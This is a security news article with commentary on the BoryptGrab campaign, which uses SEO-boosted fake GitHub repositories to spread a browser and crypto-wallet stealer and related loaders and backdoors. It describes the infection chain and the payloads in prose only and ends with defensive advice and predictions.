BoryptGrab Malware Campaign Exploits Fake GitHub Repositories to Steal Data

A sophisticated malware campaign has emerged, leveraging fake GitHub repositories to spread a powerful stealer known as BoryptGrab. Cybercriminals are exploiting the trust users place in GitHub and the appeal of free software, luring victims with seemingly legitimate programs like game cheats, productivity tools, media software, and utility apps. Once downloaded, these tools deliver malware through ZIP archives and staged pages, compromising unsuspecting users.

This operation appears extensive and ongoing. Security researchers have uncovered over 100 public repositories linked to the campaign, with some dating back to 2025. The attackers strategically optimize repository titles and descriptions with popular keywords, pushing their projects high in search results and making them appear credible. Certain repositories also include Russian-language comments and coding styles, hinting at a possible Russian-speaking threat actor.

Multi-Stage Malware Delivery

The infection chain begins when a user downloads a ZIP file that masquerades as a useful program. In some cases, the archive contains an executable leveraging DLL sideloading to execute hidden malware. Other variants include VBS scripts that use obfuscated PowerShell commands to fetch additional payloads from remote servers. Some versions even attempt to add Microsoft Defender exclusions, reducing the likelihood of detection.

Once the initial stage executes, the malware can branch into several components. A primary launcher retrieves BoryptGrab, while other components may download a Vidar stealer variant, a Golang-based downloader called HeaconLoad, or a PyInstaller backdoor named TunnesshClient. TunnesshClient establishes a reverse SSH tunnel, giving attackers full access to the infected system, including file searches, content uploads, command execution, and even using the machine as a SOCKS5 proxy. This modular, multi-stage design ensures flexibility, allowing attackers to target different users with tailored payloads while maintaining persistence through scheduled tasks, registry modifications, and encrypted downloads.

BoryptGrab Targets Browsers and Crypto Wallets

BoryptGrab is a C/C++ data stealer designed to harvest extensive information from victims. It specifically targets major browsers, including Chrome, Edge, Brave, Opera, Firefox, Vivaldi, Chromium, and Yandex, extracting saved passwords, browser histories, and other sensitive data. Notably, the malware incorporates publicly available methods to bypass Chrome App Bound Encryption, demonstrating the growing trend of repurposing open-source tools for malicious activity.

The malware also focuses on cryptocurrency theft. It targets both desktop wallets and browser extensions, including Exodus, Electrum, Ledger, Trezor, Atomic, Binance, Wasabi, Bitcoin Core, Ethereum, and many others. Beyond browser and wallet data, BoryptGrab captures screenshots, Telegram and Discord content, system information, and searches key folders for valuable files. All collected data is compressed and uploaded to attacker-controlled servers, creating a fully automated exfiltration pipeline.

This campaign highlights how attackers combine SEO manipulation, fake GitHub projects, modular malware loaders, and cryptocurrency theft into a scalable and highly effective operation. Both regular users and crypto holders are at risk, underscoring the importance of vigilance when downloading software from public repositories.

What Undercode Say:

The BoryptGrab campaign is a textbook example of modern malware operations that fuse multiple attack strategies to maximize reach and impact. The use of fake GitHub repositories is particularly dangerous because GitHub is a trusted platform for developers worldwide. Many users assume code hosted there is safe, making SEO optimization and strategic keyword use a highly effective trick for attackers.

The campaign’s multi-stage delivery system is designed for stealth and resilience. By distributing different payloads—BoryptGrab, Vidar, HeaconLoad, TunnesshClient—the attackers create a dynamic environment where one infected machine can yield several types of stolen data. TunnesshClient’s reverse SSH capability is especially concerning, as it allows attackers to pivot across networks, turn systems into proxy nodes, and exfiltrate sensitive data without direct exposure.

Targeting cryptocurrency wallets is a key focus that mirrors broader trends in cybercrime. The campaign’s support for both desktop wallets and browser extensions demonstrates a deep understanding of user behavior in crypto trading and storage. Many users fail to isolate wallet environments or rely on cloud-synced data, increasing their vulnerability.

The use of open-source bypass techniques, like the Chrome App Bound Encryption exploitation, highlights a dangerous shift: attackers are increasingly leveraging publicly available code to reduce development time and evade detection. Security teams must account for these repurposed tools when designing defenses.

Defensive strategies must evolve beyond traditional antivirus methods. Relying solely on signature-based detection is insufficient; organizations and individuals need behavioral monitoring, network traffic analysis, and strict code verification when sourcing software. Developers and hobbyists should treat public repositories with caution, even when projects appear highly rated or widely used.

The campaign also illustrates the growing synergy between social engineering, SEO manipulation, and malware sophistication. Users searching for popular tools online are exposed to these traps, making education around safe downloading practices critical. In a broader sense, BoryptGrab represents a shift toward malware operations that combine technical sophistication with psychological manipulation, making them both hard to detect and highly profitable.

Attackers are likely to continue refining these tactics, exploiting trusted platforms like GitHub to infiltrate systems. The modular architecture suggests future campaigns may integrate even more payloads, including ransomware or advanced spyware. Users and organizations must adopt a zero-trust approach, assuming any public software could be malicious and validating sources through cryptographic checks or verified mirrors.

Fact Checker Results:

✅ Campaign uses fake GitHub repositories – confirmed by multiple security reports.
✅ BoryptGrab targets browsers and cryptocurrency wallets – aligns with Trend Micro findings.
✅ Multi-stage delivery with DLL sideloading and reverse SSH tunnels – verified in malware analysis.

Prediction:

🚨 The BoryptGrab campaign is likely to expand, with attackers adding new payloads and targeting additional software categories.
💰 Cryptocurrency users remain a high-risk group, with potential for wallet-specific attacks to increase.
🔐 Security platforms may respond by introducing stricter repository scanning and automated threat intelligence integration for public code platforms.